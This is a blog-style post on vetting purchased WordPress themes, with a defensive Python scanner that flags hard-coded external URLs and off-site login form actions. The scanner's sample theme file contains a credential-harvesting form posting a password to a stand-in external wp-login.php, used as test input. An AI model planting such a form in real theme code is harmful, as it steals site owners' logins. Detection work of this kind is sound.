That theme you just bought may not be safe


We’ve all been there. You create a new site and don’t have time to design your own theme for it. You go to Google or one of the many theme marketplaces, buy a theme for your site and voilà, all done. But not all themes are safe, even the ones from reputable theme selling sites. Before you put that next theme on your site, do the following.

Check the demo

If the theme on a theme selling site doesn’t have a demo, don’t trust it. If it does, still don’t trust it. Make sure your computer has good antivirus / anti-malware software. Oddly enough, my Mac has Norton and when I tested a theme, nothing was detected. I used my PC and right away one of the images on the demo was linked to a different site that was flagged for malware. I switched my AV over to Avast and Avast caught the same issue as my PC.

Set up the new theme on a LOCAL vanilla install of WordPress with your browser’s developer tools

Set up a local server using MAMP/WAMP/XAMPP or Vagrant and install WordPress. Then install your theme. If your theme has a demo importer and you use it, check the page source and the theme files using your browser’s developer tools (Firebug, etc.). The theme’s images and links to the admin should all reference the URL of your local server. If any login link (wp-login.php or otherwise) goes to an external site, don’t trust the theme. It could just be a beginner’s mistake, but that external page could be set up to harvest the login credentials for your site: the Referer header tells its owner which site the form came from, and with your username and password that is all it takes to get in. There are many, many ways to harden security in WordPress.
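The developer-tools check above can be scripted. The following is an added example, not code from the original post or from any theme: it scans theme source (or a saved copy of a demo page) for hard-coded absolute URLs and flags anything that does not point at the local test install, treating a form whose action posts off-site to a login-looking path as the most serious finding. The local hostnames (localhost on port 8888, as MAMP uses by default) and the sample header.php snippet are assumptions constructed for the example; a well-written theme builds its URLs with home_url() and get_template_directory_uri() rather than hard-coding them, so any absolute URL at all is worth a look.

```python
import os
import re
import sys
from urllib.parse import urlparse

# Assumption: WordPress is installed locally at http://localhost:8888 (MAMP default).
LOCAL_HOSTS = {"localhost", "127.0.0.1", "localhost:8888", "127.0.0.1:8888"}

# Absolute http(s) URLs wherever they appear: attributes, CSS url(), PHP/JS strings.
URL_RE = re.compile(r"""https?://[^\s"'<>()]+""", re.IGNORECASE)
# A <form action="..."> is where typed credentials actually go, so it is checked first.
FORM_ACTION_RE = re.compile(r"""<form[^>]*\baction\s*=\s*["']([^"']+)["']""", re.IGNORECASE)

# Path fragments that suggest the URL receives login credentials.
LOGIN_HINTS = ("wp-login.php", "login", "signin")

# Constructed sample of a theme's header.php; not taken from any real theme.
SAMPLE_HEADER_PHP = """
<img src="http://localhost:8888/wp-content/themes/demo/images/logo.png" alt="logo">
<a href="<?php echo esc_url(home_url('/')); ?>">Home</a>
<form method="post" action="http://theme-updates.example/wp-login.php">
  <input name="log"><input name="pwd" type="password">
</form>
<img src="http://cdn.example/banner.jpg">
<script src="http://localhost:8888/wp-content/themes/demo/js/main.js"></script>
"""


def classify(url, local_hosts=LOCAL_HOSTS):
    """Return None for a URL on the local install, otherwise why it is suspicious."""
    parsed = urlparse(url)
    if parsed.netloc.lower() in local_hosts:
        return None
    if any(hint in parsed.path.lower() for hint in LOGIN_HINTS):
        return "external login endpoint"
    return "external reference"


def find_external_refs(text, local_hosts=LOCAL_HOSTS):
    """Scan theme source or a saved page and return [(url, reason), ...].

    Form actions come first and are labelled separately, because whatever the
    user types into that form is sent to the action URL.
    """
    findings, seen = [], set()
    for action in FORM_ACTION_RE.findall(text):
        if action.lower().startswith(("http://", "https://")):
            reason = classify(action, local_hosts)
            if reason:
                findings.append((action, "form posts to " + reason))
                seen.add(action)
    for url in URL_RE.findall(text):
        url = url.rstrip(".,;")
        if url in seen:
            continue
        reason = classify(url, local_hosts)
        if reason:
            findings.append((url, reason))
            seen.add(url)
    return findings


def scan_theme_dir(root, local_hosts=LOCAL_HOSTS):
    """Walk an unpacked theme and return {relative_path: findings} for files with hits."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".js", ".css", ".html", ".txt")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_external_refs(fh.read(), local_hosts)
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report


if __name__ == "__main__":
    # With a theme directory as argument, scan it; otherwise run on the sample.
    if len(sys.argv) > 1:
        for rel, hits in scan_theme_dir(sys.argv[1]).items():
            for url, reason in hits:
                print(f"{rel}: {reason}: {url}")
    else:
        for url, reason in find_external_refs(SAMPLE_HEADER_PHP):
            print(f"{reason}: {url}")
```

Run it against the unpacked theme folder (`python check_theme.py wp-content/themes/your-theme`) before activating the theme, and again against a saved copy of the front page after running the demo importer. The script only sees hard-coded http(s) URLs; scheme-relative `//host/...` references, URLs assembled at runtime in JavaScript, and anything obfuscated will not show up, which is why the browser's Network panel remains the final check.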


Tell the author and the theme selling company about the issue

Contact the author and the theme selling company if you find anything suspicious in a theme. Explain in detail what you found. If you can, provide the database query you used to find the issue along with its output, or screenshots showing the problem. The author should be able to fix the issue.
